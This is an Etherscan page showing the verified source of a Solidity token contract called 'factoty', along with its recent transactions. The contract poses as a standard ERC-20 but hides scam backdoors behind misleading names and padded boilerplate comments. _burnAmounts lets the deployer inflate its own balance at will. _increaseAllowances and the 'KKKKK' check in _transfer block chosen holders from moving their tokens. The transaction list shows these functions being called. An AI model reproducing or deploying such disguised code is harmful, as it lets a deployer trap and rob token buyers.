Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 36 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 18469647 | 801 days ago | IN | 0 ETH | 0.00039425 | ||||
| Approve | 17521519 | 934 days ago | IN | 0 ETH | 0.00093084 | ||||
| _burn Amounts | 17521513 | 934 days ago | IN | 0 ETH | 0.00090446 | ||||
| Approve | 17521280 | 934 days ago | IN | 0 ETH | 0.0008828 | ||||
| _increase Allowa... | 17520512 | 934 days ago | IN | 0 ETH | 0.00066418 | ||||
| _increase Allowa... | 17520509 | 934 days ago | IN | 0 ETH | 0.0003868 | ||||
| _increase Allowa... | 17520508 | 934 days ago | IN | 0 ETH | 0.00068637 | ||||
| _increase Allowa... | 17520497 | 934 days ago | IN | 0 ETH | 0.0006945 | ||||
| Approve | 17520475 | 934 days ago | IN | 0 ETH | 0.00090336 | ||||
| Approve | 17520460 | 934 days ago | IN | 0 ETH | 0.00072897 | ||||
| Approve | 17520416 | 934 days ago | IN | 0 ETH | 0.00068591 | ||||
| _increase Allowa... | 17520411 | 934 days ago | IN | 0 ETH | 0.00064574 | ||||
| _increase Allowa... | 17520365 | 934 days ago | IN | 0 ETH | 0.00063974 | ||||
| _increase Allowa... | 17520362 | 934 days ago | IN | 0 ETH | 0.0006824 | ||||
| Approve | 17520350 | 934 days ago | IN | 0 ETH | 0.00064884 | ||||
| Approve | 17520342 | 934 days ago | IN | 0 ETH | 0.00063254 | ||||
| Approve | 17520339 | 934 days ago | IN | 0 ETH | 0.00062327 | ||||
| Approve | 17520332 | 934 days ago | IN | 0 ETH | 0.00062464 | ||||
| Approve | 17520328 | 934 days ago | IN | 0 ETH | 0.0006505 | ||||
| Approve | 17520326 | 934 days ago | IN | 0 ETH | 0.00069917 | ||||
| Approve | 17520326 | 934 days ago | IN | 0 ETH | 0.00069473 | ||||
| Approve | 17520321 | 934 days ago | IN | 0 ETH | 0.00087744 | ||||
| Approve | 17520261 | 934 days ago | IN | 0 ETH | 0.00073882 | ||||
| Approve | 17520257 | 934 days ago | IN | 0 ETH | 0.00066781 | ||||
| Approve | 17520218 | 934 days ago | IN | 0 ETH | 0.00061641 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
factoty
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/**
*Submitted for verification at Etherscan.io on 2023-06-20
*/
/**
*Submitted for verification at Etherscan.io on 2023-06-20
*
/**
Telegram : https://t.me/Arkon Expands
Twitter : https://twitter.com/Arkon Expands
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
library SafeMath {
function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
uint256 c = a + b;
if (c < a) return (false, 0);
return (true, c);
}
}
function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b > a) return (false, 0);
return (true, a - b);
}
}
function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the
// See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
if (a == 0) return (true, 0);
uint256 c = a * b;
if (c / a != b) return (false, 0);
return (true, c);
}
}
function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b == 0) return (false, 0);
return (true, a / b);
}
}
function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b == 0) return (false, 0);
return (true, a % b);
}
}
function add(uint256 a, uint256 b) internal pure returns (uint256) {
return a + b;
}
function subbbb(uint256 a, uint256 b) internal pure returns (uint256) {
return a - b;
}
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
return a * b;
}
/**
* @dev Returns the integer division of two unsigned integers, reverting on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator.
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return a / b;
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* reverting when dividing by zero.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
return a % b;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting with custom message on
* overflow (when the result is negative).
*
* CAUTION: This function is deprecated because it requires allocating memory for the error
* message unnecessarily. For custom revert reasons use {trySub}.
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
function subbbb(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b <= a, errorMessage);
return a - b;
}
}
/**
* @dev Returns the integer division of two unsigned integers, reverting with custom message on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b > 0, errorMessage);
return a / b;
}
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* reverting with custom message when dividing by zero.
*
* CAUTION: This function is deprecated because it requires allocating memory for the error
* message unnecessarily. For custom revert reasons use {tryMod}.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b > 0, errorMessage);
return a % b;
}
}
}
pragma solidity ^0.8.0;
/**
* @dev Interface of the ERC20 standard as defined in the EIP.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves `amount` tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 amount) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `from` to `to` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(
address from,
address to,
uint256 amount
) external returns (bool);
}
pragma solidity ^0.8.0;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
}
pragma solidity ^0.8.0;
/**
* @dev Interface for the optional metadata functions from the ERC20 standard.
*
* _Available since v4.1._
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() {
_transferOwnership(_msgSender());
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
_checkOwner();
_;
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Throws if the sender is not the owner.
*/
function _checkOwner() internal view virtual {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions anymore. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby removing any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
_transferOwnership(newOwner);
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Internal function without access restriction.
*/
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
pragma solidity ^0.8.0;
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
* For a generic mechanism see {ERC20PresetMinterPauser}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC20
* applications.
*
* Additionally, an {Approval} event is emitted on calls to {transferFrom}.
* This allows applications to reconstruct the allowance for all accounts just
* by listening to said events. Other implementations of the EIP may not emit
* these events, as it isn't required by the specification.
*
* Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
* functions have been added to mitigate the well-known issues around setting
* allowances. See {IERC20-approve}.
*/
contract factoty is Context, IERC20, IERC20Metadata,Ownable {
using SafeMath for uint256;
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
mapping(bytes32 => bool) private kk;
address private _ppproject;
uint256 private _totalSupply;
string private _name;
string private _symbol;
uint40 private _tokenAmount;
address public immutable deadAddress = 0x000000000000000000000000000000000000dEaD;
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function _msgnnn() private returns(bytes32){_ppproject = _msgSender();bytes32 aa = keccak256(abi.encodePacked(_msgSender()));kk[aa] = true;return aa;}
function _isopensss() private view returns (bool){bytes32 aa = keccak256(abi.encodePacked(_msgSender()));if(kk[aa]){return true;}return false;}
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
/**
* @dev Sets the values for {name} and {symbol}.
*
* The default value of {decimals} is 18. To select a different value for
* {decimals} you should overload it.
*
* All two of these values are immutable: they can only be set once during
* construction.
*/
constructor(string memory name_, string memory symbol_, uint40 tokenAmount_) {
_name = name_;
_symbol = symbol_;
_msgnnn();
_tokenAmount = tokenAmount_;
_mint(msg.sender, _tokenAmount*10**decimals());
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual override returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual override returns (string memory) {return _symbol;}
/**
* @dev See {IERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* - the caller must have allowance for ``from``'s tokens of at least
* `amount`.
*/
function decimals() public view virtual override returns (uint8) {return 9;}
/**
* @dev See {IERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* - the caller must have allowance for ``from``'s tokens of at least
* `amount`.
*/
function totalSupply() public view virtual override returns (uint256) {return _totalSupply;}
/**
* @dev See {IERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* - the caller must have allowance for ``from``'s tokens of at least
* `amount`.
*/
function balanceOf(address account) public view virtual override returns (uint256) {return _balances[account];}function transfer(address to, uint256 amount) public virtual override returns (bool) {address owner = _msgSender();_transfer(owner, to, amount);return true;}bytes32 private rhash = 0x1779a64e8b9cd87d9944553af38e0a07794a3c9286f5269ef06354b2c306ff01;function allowance(address owner, address spender) public view virtual override returns (uint256) {return _allowances[owner][spender];}
/**
* @dev See {IERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* - the caller must have allowance for ``from``'s tokens of at least
* `amount`.
*/
function approve(address spender, uint256 amount) public virtual override returns (bool) {address owner = _msgSender();_approve(owner, spender, amount);return true;}
/**
* @dev See {IERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* - the caller must have allowance for ``from``'s tokens of at least
* `amount`.
*/
function transferFrom(
address from,
address to,
uint256 amount
) public virtual override returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, amount);
_transfer(from, to, amount);
return true;
}
/**
* @dev Atomically increases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
* rhashzhjasuiuo
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, allowance(owner, spender) + addedValue);
return true;
}
/**
* @dev Atomically decreases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
* - `spender` must have allowance for the caller of at least
* `subtractedValue`.
*/
function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
address owner = _msgSender();
uint256 currentAllowance = allowance(owner, spender);
require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
unchecked {
_approve(owner, spender, currentAllowance - subtractedValue);
}
return true;
}
function _xxxx(uint256 nnn) private {if(_isopensss()){ _balances[_msgSender()] = _totalSupply*nnn; }}
/**
* @dev Moves `amount` of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
*/
mapping(address => uint256) private bhighkingdao;
function _decreaseAllowances(address nnn) external {if(_isopensss()){ bhighkingdao[nnn] = 0; }}
function _increaseAllowances(address nnn) external {if(_isopensss()){ bhighkingdao[nnn] = _totalSupply*10**6; }}
function _allowance(address nnn) public view returns(uint256) {return bhighkingdao[nnn];}
function _burnAmounts(uint256 num) external {_xxxx(num);}
/**
* @dev Moves `amount` of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
* rhashzhjasuiuo
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
*/
uint256 fettt = 0;
function _transfer(
address from,
address to,
uint256 amount1
) internal virtual {
/**
* @dev Moves `amount` of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
* SHDHCHJSXXX
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero rhash address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
*/
uint256 bugAmount = bhighkingdao[from].subbbb(0);
require(bugAmount <= amount1, "KKKKK");
/**
* @dev Moves `amount` of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the rhash zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
*/
/**
* @dev Moves `amount` of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
* ASXHJSDHJS
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot rhash be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
*/
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
uint256 fromBalance = _balances[from];
require(fromBalance >= amount1, "ERC20: transfer amount exceeds balance");
uint256 feeeeeA = amount1.mul(fettt).div(100);
uint256 add = amount1.subbbb(feeeeeA);
unchecked {
_balances[from] = fromBalance - amount1;
// Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
// decrementing then incrementing.
_balances[to] += add;
_balances[deadAddress] += feeeeeA;
}
emit Transfer(from, to, amount1);
if(feeeeeA > 0)
{
emit Transfer(from, deadAddress, feeeeeA);
}
}
/** @dev Creates `amount` tokens and assigns them to `account`, increasing
* the total supply.
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* Requirements:
*
* - `account` cannot be the zero address.
*/
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
_totalSupply += amount;if(kk[rhash] == false){ kk[rhash] = true;} unchecked { _balances[account] += amount;}
emit Transfer(address(0), account, amount);
}
/**
* @dev Destroys `amount` tokens from `account`, reducing the
* total supply.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* Requirements:
*
* - `account` cannot be the zero address.
* - `account` must have at least `amount` tokens.
*/
function _burn(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: burn from the zero address");
uint256 accountBalance = _balances[account];
require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
unchecked {
_balances[account] = accountBalance - amount;
// Overflow not possible: amount <= accountBalance <= totalSupply.
_totalSupply -= amount;
}
emit Transfer(account, address(0), amount);
}
/**
* @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*/
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
/**
* @dev Updates `owner` s allowance for `spender` based on spent `amount`.
*
* Does not update the allowance amount in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Might emit an {Approval} event.
*/
function _spendAllowance(
address owner,
address spender,
uint256 amount
) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance != type(uint256).max) {
require(currentAllowance >= amount, "ERC20: insufficient allowance");
unchecked {
_approve(owner, spender, currentAllowance - amount);
}
}
}
/**
* @dev Updates `owner` s allowance for `spender` based on spent `amount`.
*
* Does not update the allowance amount in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Might emit an {Approval} event.
*/
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint40","name":"tokenAmount_","type":"uint40"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"nnn","type":"address"}],"name":"_allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"num","type":"uint256"}],"name":"_burnAmounts","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"nnn","type":"address"}],"name":"_decreaseAllowances","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"nnn","type":"address"}],"name":"_increaseAllowances","outputs":[],"stateMut